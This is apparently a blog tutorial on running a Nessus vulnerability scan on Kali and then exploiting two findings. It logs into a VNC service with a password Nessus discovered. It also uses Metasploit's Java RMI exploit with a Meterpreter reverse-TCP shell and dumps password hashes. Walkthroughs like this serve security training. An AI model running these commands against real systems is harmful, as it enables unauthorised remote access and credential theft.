How to Perform Vulnerability Scan in Nessus : VNC and RMI Registry Vulnerability Exploitations


Previous articles: How to Install Nessus on Kali , How to Create a policy in Nessus

Step 1:

Go to My Scans section and click New Scan

Step 2:

Go to User Defined Scan and select our Policy

Refer this article to Create Policy:

Step 3:

Enter Name and Description for our first scan

Step 4:

Add IP address to scan and Save

Sep 5:

Select MyScan and Click Launch icon

Step 6:

Click MyScan to see details

Step 7:

Click Vulnerabilities Tab to see the result

Test VNC Vulnerability identified by Nessus

Run a VNC Viewer by typing xvncviewer. Enter the IP address

To install vnc viewer in kali
    # sudo apt-get install xvncviewer

Enter the password identified by Nessus

Connection Established

        # whoami

        # uname -a

List directory contents

Vulnerability: RMI Registry Detection

Scan open ports in Background


└─$ nmap -sS -sV -p1-65535


          Run msfconsole

Search Exploits of Java_RMI

        msf6 > search java_rmi

        msf6 > use exploit/multi/misc/java_rmi_server

        msf6 exploit(multi/misc/java_rmi_server) > show payloads

        msf6 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp

        msf6 exploit(multi/misc/java_rmi_server) > show options

        msf6 exploit(multi/misc/java_rmi_server) > set RHOST

        msf6 exploit(multi/misc/java_rmi_server) > set SRVHOST

        msf6 exploit(multi/misc/java_rmi_server) > set LHOST

        msf6 exploit(multi/misc/java_rmi_server) > show options

        msf6 exploit(multi/misc/java_rmi_server) > exploit

Once the connection is obtained, 

        # sessions –l

        # sessions –i 1

        # sysinfo

        # hashdump

        # run /post/linux/gather/hashdump

        # getuid

How to Install Nessus on Kali
How to Create a policy in Nessus

No comments:

Powered by Blogger.